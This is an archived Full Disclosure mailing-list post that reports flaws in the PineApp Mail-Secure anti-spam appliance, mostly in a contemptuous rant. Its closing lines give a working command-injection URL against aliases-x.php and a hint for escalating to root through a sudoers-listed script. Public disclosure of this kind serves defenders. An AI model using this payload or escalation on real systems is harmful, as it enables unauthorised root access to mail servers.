Full Disclosure mailing list archives
remote root exploit in pineapp mail-secure
From: yello man <yelloman7 () outlook com>
Date: Tue, 15 Oct 2013 04:26:21 +0000
pineapp makes an anti-spam product, which can be downloaded for vmware, etc. the security of the product is a fucking joke, containing everything from authentication bypass to root exploits. there is really no hope, the developers didnt even try. they can patch those specific vulnerabilities, but have no idea what theyre doing. i only scratched its surface. unfiltered system() in http://192.168.9.2/aliases-x.php?getLdapDC=wtf&ldapserver=;id>/tmp/wtf; escalate to root by creating for example /usr/local/bin/cfma-mirror.sh (in sudoers) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- remote root exploit in pineapp mail-secure yello man (Oct 15)